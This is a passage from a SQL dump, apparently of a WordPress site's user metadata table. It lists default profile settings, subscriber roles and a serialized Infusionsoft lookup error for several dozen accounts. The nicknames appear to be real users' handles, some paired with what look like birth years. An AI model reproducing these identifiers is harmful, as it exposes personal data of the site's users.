(15382, 1175, 'nickname', 'wolf.dm1995'),
(15383, 1175, 'first_name', ''),
(15384, 1175, 'last_name', ''),
(15385, 1175, 'description', ''),
(15386, 1175, 'rich_editing', 'true'),
(15387, 1175, 'comment_shortcuts', 'false'),
(15388, 1175, 'admin_color', 'fresh'),
(15389, 1175, 'use_ssl', '0'),
(15390, 1175, 'show_admin_bar_front', 'true'),
(15391, 1175, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15392, 1175, 'cyb_user_level', '0'),
(15393, 1175, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15394, 1175, 'default_password_nag', '1'),
(15395, 1176, 'nickname', 'srajmalani1969'),
(15396, 1176, 'first_name', ''),
(15397, 1176, 'last_name', ''),
(15398, 1176, 'description', ''),
(15399, 1176, 'rich_editing', 'true'),
(15400, 1176, 'comment_shortcuts', 'false'),
(15401, 1176, 'admin_color', 'fresh'),
(15402, 1176, 'use_ssl', '0'),
(15403, 1176, 'show_admin_bar_front', 'true'),
(15404, 1176, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15405, 1176, 'cyb_user_level', '0'),
(15406, 1176, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15407, 1176, 'default_password_nag', '1'),
(15408, 1177, 'nickname', 'wstein701974'),
(15409, 1177, 'first_name', ''),
(15410, 1177, 'last_name', ''),
(15411, 1177, 'description', ''),
(15412, 1177, 'rich_editing', 'true'),
(15413, 1177, 'comment_shortcuts', 'false'),
(15414, 1177, 'admin_color', 'fresh'),
(15415, 1177, 'use_ssl', '0'),
(15416, 1177, 'show_admin_bar_front', 'true'),
(15417, 1177, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15418, 1177, 'cyb_user_level', '0'),
(15419, 1177, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15420, 1177, 'default_password_nag', '1'),
(15421, 1178, 'nickname', 'haydenswerling1991'),
(15422, 1178, 'first_name', ''),
(15423, 1178, 'last_name', ''),
(15424, 1178, 'description', ''),
(15425, 1178, 'rich_editing', 'true'),
(15426, 1178, 'comment_shortcuts', 'false'),
(15427, 1178, 'admin_color', 'fresh'),
(15428, 1178, 'use_ssl', '0'),
(15429, 1178, 'show_admin_bar_front', 'true'),
(15430, 1178, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15431, 1178, 'cyb_user_level', '0'),
(15432, 1178, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15433, 1178, 'default_password_nag', '1'),
(15434, 1179, 'nickname', 'mselvidge377212001'),
(15435, 1179, 'first_name', ''),
(15436, 1179, 'last_name', ''),
(15437, 1179, 'description', ''),
(15438, 1179, 'rich_editing', 'true'),
(15439, 1179, 'comment_shortcuts', 'false'),
(15440, 1179, 'admin_color', 'fresh'),
(15441, 1179, 'use_ssl', '0'),
(15442, 1179, 'show_admin_bar_front', 'true'),
(15443, 1179, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15444, 1179, 'cyb_user_level', '0'),
(15445, 1179, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15446, 1179, 'default_password_nag', '1'),
(15447, 1180, 'nickname', 'pauldsmith19861951'),
(15448, 1180, 'first_name', ''),
(15449, 1180, 'last_name', ''),
(15450, 1180, 'description', ''),
(15451, 1180, 'rich_editing', 'true'),
(15452, 1180, 'comment_shortcuts', 'false'),
(15453, 1180, 'admin_color', 'fresh'),
(15454, 1180, 'use_ssl', '0'),
(15455, 1180, 'show_admin_bar_front', 'true'),
(15456, 1180, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15457, 1180, 'cyb_user_level', '0'),
(15458, 1180, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15459, 1180, 'default_password_nag', '1'),
(15460, 1181, 'nickname', 'clewisneel1969'),
(15461, 1181, 'first_name', ''),
(15462, 1181, 'last_name', ''),
(15463, 1181, 'description', ''),
(15464, 1181, 'rich_editing', 'true'),
(15465, 1181, 'comment_shortcuts', 'false'),
(15466, 1181, 'admin_color', 'fresh'),
(15467, 1181, 'use_ssl', '0'),
(15468, 1181, 'show_admin_bar_front', 'true'),
(15469, 1181, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15470, 1181, 'cyb_user_level', '0'),
(15471, 1181, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15472, 1181, 'default_password_nag', '1'),
(15473, 1182, 'nickname', 's.i.j.warren1966'),
(15474, 1182, 'first_name', ''),
(15475, 1182, 'last_name', ''),
(15476, 1182, 'description', ''),
(15477, 1182, 'rich_editing', 'true'),
(15478, 1182, 'comment_shortcuts', 'false'),
(15479, 1182, 'admin_color', 'fresh'),
(15480, 1182, 'use_ssl', '0'),
(15481, 1182, 'show_admin_bar_front', 'true'),
(15482, 1182, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15483, 1182, 'cyb_user_level', '0'),
(15484, 1182, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15485, 1182, 'default_password_nag', '1'),
(15486, 1183, 'nickname', 'znlupetin2008'),
(15487, 1183, 'first_name', ''),
(15488, 1183, 'last_name', ''),
(15489, 1183, 'description', ''),
(15490, 1183, 'rich_editing', 'true'),
(15491, 1183, 'comment_shortcuts', 'false'),
(15492, 1183, 'admin_color', 'fresh'),
(15493, 1183, 'use_ssl', '0'),
(15494, 1183, 'show_admin_bar_front', 'true'),
(15495, 1183, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15496, 1183, 'cyb_user_level', '0'),
(15497, 1183, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15498, 1183, 'default_password_nag', '1'),
(15499, 1184, 'nickname', 'greis.anna1986'),
(15500, 1184, 'first_name', ''),
(15501, 1184, 'last_name', ''),
(15502, 1184, 'description', ''),
(15503, 1184, 'rich_editing', 'true'),
(15504, 1184, 'comment_shortcuts', 'false'),
(15505, 1184, 'admin_color', 'fresh'),
(15506, 1184, 'use_ssl', '0'),
(15507, 1184, 'show_admin_bar_front', 'true'),
(15508, 1184, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15509, 1184, 'cyb_user_level', '0'),
(15510, 1184, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15511, 1184, 'default_password_nag', '1'),
(15512, 1185, 'nickname', 'ashthoughton2002'),
(15513, 1185, 'first_name', ''),
(15514, 1185, 'last_name', ''),
(15515, 1185, 'description', ''),
(15516, 1185, 'rich_editing', 'true'),
(15517, 1185, 'comment_shortcuts', 'false'),
(15518, 1185, 'admin_color', 'fresh'),
(15519, 1185, 'use_ssl', '0'),
(15520, 1185, 'show_admin_bar_front', 'true'),
(15521, 1185, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15522, 1185, 'cyb_user_level', '0'),
(15523, 1185, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15524, 1185, 'default_password_nag', '1'),
(15525, 1186, 'nickname', 'lilviasoto1968'),
(15526, 1186, 'first_name', ''),
(15527, 1186, 'last_name', ''),
(15528, 1186, 'description', ''),
(15529, 1186, 'rich_editing', 'true'),
(15530, 1186, 'comment_shortcuts', 'false'),
(15531, 1186, 'admin_color', 'fresh'),
(15532, 1186, 'use_ssl', '0'),
(15533, 1186, 'show_admin_bar_front', 'true'),
(15534, 1186, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15535, 1186, 'cyb_user_level', '0'),
(15536, 1186, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15537, 1186, 'default_password_nag', '1'),
(15538, 1187, 'nickname', 'jamiehudson301977'),
(15539, 1187, 'first_name', ''),
(15540, 1187, 'last_name', ''),
(15541, 1187, 'description', ''),
(15542, 1187, 'rich_editing', 'true'),
(15543, 1187, 'comment_shortcuts', 'false'),
(15544, 1187, 'admin_color', 'fresh'),
(15545, 1187, 'use_ssl', '0'),
(15546, 1187, 'show_admin_bar_front', 'true'),
(15547, 1187, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15548, 1187, 'cyb_user_level', '0'),
(15549, 1187, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15550, 1187, 'default_password_nag', '1'),
(15551, 1188, 'nickname', 'princewill1211992'),
(15552, 1188, 'first_name', ''),
(15553, 1188, 'last_name', ''),
(15554, 1188, 'description', ''),
(15555, 1188, 'rich_editing', 'true'),
(15556, 1188, 'comment_shortcuts', 'false'),
(15557, 1188, 'admin_color', 'fresh'),
(15558, 1188, 'use_ssl', '0'),
(15559, 1188, 'show_admin_bar_front', 'true'),
(15560, 1188, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15561, 1188, 'cyb_user_level', '0'),
(15562, 1188, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15563, 1188, 'default_password_nag', '1'),
(15564, 1189, 'nickname', 'sarahpossx31968'),
(15565, 1189, 'first_name', ''),
(15566, 1189, 'last_name', ''),
(15567, 1189, 'description', ''),
(15568, 1189, 'rich_editing', 'true'),
(15569, 1189, 'comment_shortcuts', 'false'),
(15570, 1189, 'admin_color', 'fresh'),
(15571, 1189, 'use_ssl', '0'),
(15572, 1189, 'show_admin_bar_front', 'true'),
(15573, 1189, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15574, 1189, 'cyb_user_level', '0'),
(15575, 1189, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15576, 1189, 'default_password_nag', '1'),
(15577, 1190, 'nickname', 'bobby.deschner1999'),
(15578, 1190, 'first_name', ''),
(15579, 1190, 'last_name', ''),
(15580, 1190, 'description', ''),
(15581, 1190, 'rich_editing', 'true'),
(15582, 1190, 'comment_shortcuts', 'false'),
(15583, 1190, 'admin_color', 'fresh'),
(15584, 1190, 'use_ssl', '0'),
(15585, 1190, 'show_admin_bar_front', 'true'),
(15586, 1190, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15587, 1190, 'cyb_user_level', '0'),
(15588, 1190, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15589, 1190, 'default_password_nag', '1'),
(15590, 1191, 'nickname', 'bennett7651958'),
(15591, 1191, 'first_name', ''),
(15592, 1191, 'last_name', ''),
(15593, 1191, 'description', ''),
(15594, 1191, 'rich_editing', 'true'),
(15595, 1191, 'comment_shortcuts', 'false'),
(15596, 1191, 'admin_color', 'fresh'),
(15597, 1191, 'use_ssl', '0'),
(15598, 1191, 'show_admin_bar_front', 'true'),
(15599, 1191, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15600, 1191, 'cyb_user_level', '0'),
(15601, 1191, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15602, 1191, 'default_password_nag', '1'),
(15603, 1192, 'nickname', 'smaug991980'),
(15604, 1192, 'first_name', ''),
(15605, 1192, 'last_name', ''),
(15606, 1192, 'description', ''),
(15607, 1192, 'rich_editing', 'true'),
(15608, 1192, 'comment_shortcuts', 'false'),
(15609, 1192, 'admin_color', 'fresh'),
(15610, 1192, 'use_ssl', '0'),
(15611, 1192, 'show_admin_bar_front', 'true'),
(15612, 1192, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15613, 1192, 'cyb_user_level', '0'),
(15614, 1192, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15615, 1192, 'default_password_nag', '1'),
(15616, 1193, 'nickname', 'dramy941987'),
(15617, 1193, 'first_name', ''),
(15618, 1193, 'last_name', ''),
(15619, 1193, 'description', ''),
(15620, 1193, 'rich_editing', 'true'),
(15621, 1193, 'comment_shortcuts', 'false'),
(15622, 1193, 'admin_color', 'fresh'),
(15623, 1193, 'use_ssl', '0'),
(15624, 1193, 'show_admin_bar_front', 'true'),
(15625, 1193, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15626, 1193, 'cyb_user_level', '0'),
(15627, 1193, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15628, 1193, 'default_password_nag', '1'),
(15629, 1194, 'nickname', 'waikitmak1950'),
(15630, 1194, 'first_name', ''),
(15631, 1194, 'last_name', ''),
(15632, 1194, 'description', ''),
(15633, 1194, 'rich_editing', 'true'),
(15634, 1194, 'comment_shortcuts', 'false'),
(15635, 1194, 'admin_color', 'fresh'),
(15636, 1194, 'use_ssl', '0'),
(15637, 1194, 'show_admin_bar_front', 'true'),
(15638, 1194, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15639, 1194, 'cyb_user_level', '0'),
(15640, 1194, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15641, 1194, 'default_password_nag', '1'),
(15642, 1195, 'nickname', 'mitzilcoleman2009'),
(15643, 1195, 'first_name', ''),
(15644, 1195, 'last_name', ''),
(15645, 1195, 'description', ''),
(15646, 1195, 'rich_editing', 'true'),
(15647, 1195, 'comment_shortcuts', 'false'),
(15648, 1195, 'admin_color', 'fresh'),
(15649, 1195, 'use_ssl', '0'),
(15650, 1195, 'show_admin_bar_front', 'true'),
(15651, 1195, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15652, 1195, 'cyb_user_level', '0'),
(15653, 1195, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15654, 1195, 'default_password_nag', '1'),
(15655, 1196, 'nickname', 'shastaperveen1965'),
(15656, 1196, 'first_name', ''),
(15657, 1196, 'last_name', ''),
(15658, 1196, 'description', ''),
(15659, 1196, 'rich_editing', 'true'),
(15660, 1196, 'comment_shortcuts', 'false'),
(15661, 1196, 'admin_color', 'fresh'),
(15662, 1196, 'use_ssl', '0'),
(15663, 1196, 'show_admin_bar_front', 'true'),
(15664, 1196, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15665, 1196, 'cyb_user_level', '0'),
(15666, 1196, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15667, 1196, 'default_password_nag', '1'),
(15668, 1197, 'nickname', 'savannahwoods001963'),
(15669, 1197, 'first_name', ''),
(15670, 1197, 'last_name', ''),
(15671, 1197, 'description', ''),
(15672, 1197, 'rich_editing', 'true'),
(15673, 1197, 'comment_shortcuts', 'false'),
(15674, 1197, 'admin_color', 'fresh'),
(15675, 1197, 'use_ssl', '0'),
(15676, 1197, 'show_admin_bar_front', 'true'),
(15677, 1197, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15678, 1197, 'cyb_user_level', '0'),
(15679, 1197, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15680, 1197, 'default_password_nag', '1'),
(15681, 1198, 'nickname', 'yeenigomez1977'),
(15682, 1198, 'first_name', ''),
(15683, 1198, 'last_name', ''),
(15684, 1198, 'description', ''),
(15685, 1198, 'rich_editing', 'true'),
(15686, 1198, 'comment_shortcuts', 'false'),
(15687, 1198, 'admin_color', 'fresh'),
(15688, 1198, 'use_ssl', '0'),
(15689, 1198, 'show_admin_bar_front', 'true'),
(15690, 1198, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15691, 1198, 'cyb_user_level', '0'),
(15692, 1198, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15693, 1198, 'default_password_nag', '1'),
(15694, 1199, 'nickname', 'acask1971'),
(15695, 1199, 'first_name', ''),
(15696, 1199, 'last_name', ''),
(15697, 1199, 'description', ''),
(15698, 1199, 'rich_editing', 'true'),
(15699, 1199, 'comment_shortcuts', 'false'),
(15700, 1199, 'admin_color', 'fresh'),
(15701, 1199, 'use_ssl', '0'),
(15702, 1199, 'show_admin_bar_front', 'true'),
(15703, 1199, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15704, 1199, 'cyb_user_level', '0'),
(15705, 1199, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15706, 1199, 'default_password_nag', '1'),
(15707, 1200, 'nickname', 'schjah1991'),
(15708, 1200, 'first_name', ''),
(15709, 1200, 'last_name', ''),
(15710, 1200, 'description', ''),
(15711, 1200, 'rich_editing', 'true'),
(15712, 1200, 'comment_shortcuts', 'false'),
(15713, 1200, 'admin_color', 'fresh'),
(15714, 1200, 'use_ssl', '0'),
(15715, 1200, 'show_admin_bar_front', 'true'),
(15716, 1200, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15717, 1200, 'cyb_user_level', '0'),
(15718, 1200, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15719, 1200, 'default_password_nag', '1'),
(15720, 1201, 'nickname', 'gregorfercoq1958'),
(15721, 1201, 'first_name', ''),
(15722, 1201, 'last_name', ''),
(15723, 1201, 'description', ''),
(15724, 1201, 'rich_editing', 'true'),
(15725, 1201, 'comment_shortcuts', 'false'),
(15726, 1201, 'admin_color', 'fresh'),
(15727, 1201, 'use_ssl', '0'),
(15728, 1201, 'show_admin_bar_front', 'true'),
(15729, 1201, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15730, 1201, 'cyb_user_level', '0'),
(15731, 1201, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15732, 1201, 'default_password_nag', '1'),
(15733, 1202, 'nickname', 'dugan.charles1958'),
(15734, 1202, 'first_name', ''),
(15735, 1202, 'last_name', ''),
(15736, 1202, 'description', ''),
(15737, 1202, 'rich_editing', 'true'),
(15738, 1202, 'comment_shortcuts', 'false'),
(15739, 1202, 'admin_color', 'fresh'),
(15740, 1202, 'use_ssl', '0'),
(15741, 1202, 'show_admin_bar_front', 'true'),
(15742, 1202, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15743, 1202, 'cyb_user_level', '0'),
(15744, 1202, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15745, 1202, 'default_password_nag', '1'),
(15746, 1203, 'nickname', 'ragnar20302001'),
(15747, 1203, 'first_name', ''),
(15748, 1203, 'last_name', ''),
(15749, 1203, 'description', ''),
(15750, 1203, 'rich_editing', 'true'),
(15751, 1203, 'comment_shortcuts', 'false'),
(15752, 1203, 'admin_color', 'fresh'),
(15753, 1203, 'use_ssl', '0'),
(15754, 1203, 'show_admin_bar_front', 'true'),
(15755, 1203, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15756, 1203, 'cyb_user_level', '0'),
(15757, 1203, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15758, 1203, 'default_password_nag', '1'),
(15759, 1204, 'nickname', 'jcebul1978'),
(15760, 1204, 'first_name', ''),
(15761, 1204, 'last_name', ''),
(15762, 1204, 'description', ''),
(15763, 1204, 'rich_editing', 'true'),
(15764, 1204, 'comment_shortcuts', 'false'),
(15765, 1204, 'admin_color', 'fresh'),
(15766, 1204, 'use_ssl', '0'),
(15767, 1204, 'show_admin_bar_front', 'true'),
(15768, 1204, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15769, 1204, 'cyb_user_level', '0'),
(15770, 1204, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15771, 1204, 'default_password_nag', '1'),
(15772, 1205, 'nickname', 'dannske1975'),
(15773, 1205, 'first_name', ''),
(15774, 1205, 'last_name', ''),
(15775, 1205, 'description', ''),
(15776, 1205, 'rich_editing', 'true'),
(15777, 1205, 'comment_shortcuts', 'false'),
(15778, 1205, 'admin_color', 'fresh'),
(15779, 1205, 'use_ssl', '0'),
(15780, 1205, 'show_admin_bar_front', 'true'),
(15781, 1205, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15782, 1205, 'cyb_user_level', '0'),
(15783, 1205, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15784, 1205, 'default_password_nag', '1'),
(15785, 1206, 'nickname', 'msavoy441964'),
(15786, 1206, 'first_name', ''),
(15787, 1206, 'last_name', ''),
(15788, 1206, 'description', ''),
(15789, 1206, 'rich_editing', 'true'),
(15790, 1206, 'comment_shortcuts', 'false'),
(15791, 1206, 'admin_color', 'fresh'),
(15792, 1206, 'use_ssl', '0'),
(15793, 1206, 'show_admin_bar_front', 'true'),
(15794, 1206, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15795, 1206, 'cyb_user_level', '0'),
(15796, 1206, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15797, 1206, 'default_password_nag', '1'),
(15798, 1207, 'nickname', 'nevalea791957'),
(15799, 1207, 'first_name', ''),
(15800, 1207, 'last_name', ''),
(15801, 1207, 'description', ''),
(15802, 1207, 'rich_editing', 'true'),
(15803, 1207, 'comment_shortcuts', 'false'),
(15804, 1207, 'admin_color', 'fresh'),
(15805, 1207, 'use_ssl', '0'),
(15806, 1207, 'show_admin_bar_front', 'true'),
(15807, 1207, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15808, 1207, 'cyb_user_level', '0'),
(15809, 1207, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15810, 1207, 'default_password_nag', '1'),
(15811, 1208, 'nickname', 'jeff_s_schultz1975'),
(15812, 1208, 'first_name', ''),
(15813, 1208, 'last_name', ''),
(15814, 1208, 'description', ''),
(15815, 1208, 'rich_editing', 'true'),
(15816, 1208, 'comment_shortcuts', 'false'),
(15817, 1208, 'admin_color', 'fresh'),
(15818, 1208, 'use_ssl', '0'),
(15819, 1208, 'show_admin_bar_front', 'true'),
(15820, 1208, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15821, 1208, 'cyb_user_level', '0'),
(15822, 1208, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15823, 1208, 'default_password_nag', '1'),
(15824, 1209, 'nickname', 'kirsty_mcadam1969'),
(15825, 1209, 'first_name', ''),
(15826, 1209, 'last_name', ''),
(15827, 1209, 'description', ''),
(15828, 1209, 'rich_editing', 'true'),
(15829, 1209, 'comment_shortcuts', 'false'),
(15830, 1209, 'admin_color', 'fresh'),
(15831, 1209, 'use_ssl', '0'),
(15832, 1209, 'show_admin_bar_front', 'true'),
(15833, 1209, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15834, 1209, 'cyb_user_level', '0'),
(15835, 1209, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15836, 1209, 'default_password_nag', '1'),
(15837, 1210, 'nickname', 'jagonzales1999'),
(15838, 1210, 'first_name', ''),
(15839, 1210, 'last_name', ''),
(15840, 1210, 'description', ''),
(15841, 1210, 'rich_editing', 'true'),
(15842, 1210, 'comment_shortcuts', 'false'),
(15843, 1210, 'admin_color', 'fresh'),
(15844, 1210, 'use_ssl', '0'),
(15845, 1210, 'show_admin_bar_front', 'true'),
(15846, 1210, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15847, 1210, 'cyb_user_level', '0'),
(15848, 1210, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15849, 1210, 'default_password_nag', '1'),
(15850, 1211, 'nickname', 'thespiandave2010'),
(15851, 1211, 'first_name', ''),
(15852, 1211, 'last_name', ''),
(15853, 1211, 'description', ''),
(15854, 1211, 'rich_editing', 'true'),
(15855, 1211, 'comment_shortcuts', 'false'),
(15856, 1211, 'admin_color', 'fresh'),
(15857, 1211, 'use_ssl', '0'),
(15858, 1211, 'show_admin_bar_front', 'true'),
(15859, 1211, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15860, 1211, 'cyb_user_level', '0'),
(15861, 1211, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15862, 1211, 'default_password_nag', '1'),
(15863, 1212, 'nickname', 'amymyers20081966'),
(15864, 1212, 'first_name', ''),
(15865, 1212, 'last_name', ''),
(15866, 1212, 'description', ''),
(15867, 1212, 'rich_editing', 'true'),
(15868, 1212, 'comment_shortcuts', 'false'),
(15869, 1212, 'admin_color', 'fresh'),
(15870, 1212, 'use_ssl', '0'),
(15871, 1212, 'show_admin_bar_front', 'true'),
(15872, 1212, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15873, 1212, 'cyb_user_level', '0'),
